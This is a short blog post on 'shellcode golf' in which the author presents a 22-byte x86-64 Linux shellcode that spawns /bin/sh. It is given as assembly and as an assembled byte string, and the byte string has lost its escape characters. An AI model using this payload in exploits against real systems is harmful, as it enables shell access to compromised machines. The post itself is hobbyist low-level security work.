27 Apr 2016 inSecurity
So about two years ago, I put together the [shortest x86-64 shellcode for
] that I could. At the time, it was 25 bytes, which I thought was pretty damn good. However, I’m a perfectionist and so I spent some time before work this morning playing shellcode golf. The rules of my shellcode golf are pretty simple:
- The shellcode must produce the desired effect.
- It doesn’t have to do things cleanly (i.e., segfaulting after is OK, as is using APIs in unusual ways, so long as it works)
- It can assume the stack pointer is at a place where it will not segfault and it will not overwrite the shellcode itself.
- No NULLs. While there might be other constraints, this one is too common to not have as a default.
So, spending a little bit of time on this, I came up with the following 22 byte shellcode:
BITS 64 xor esi, esi push rsi mov rbx, 0x68732f2f6e69622f push rbx push rsp pop rdi imul esi mov al, 0x3b syscall
Assembled, we get:
char shellcode = "x31xF6x56x48xBBx2Fx62x69x6Ex2Fx2Fx73x68x53x54x5FxF7xEExB0x3Bx0Fx05";
This is shorter than anything I could find on shell-storm or other shellcode repositories. If you know of something shorter or think you can do better, let me know!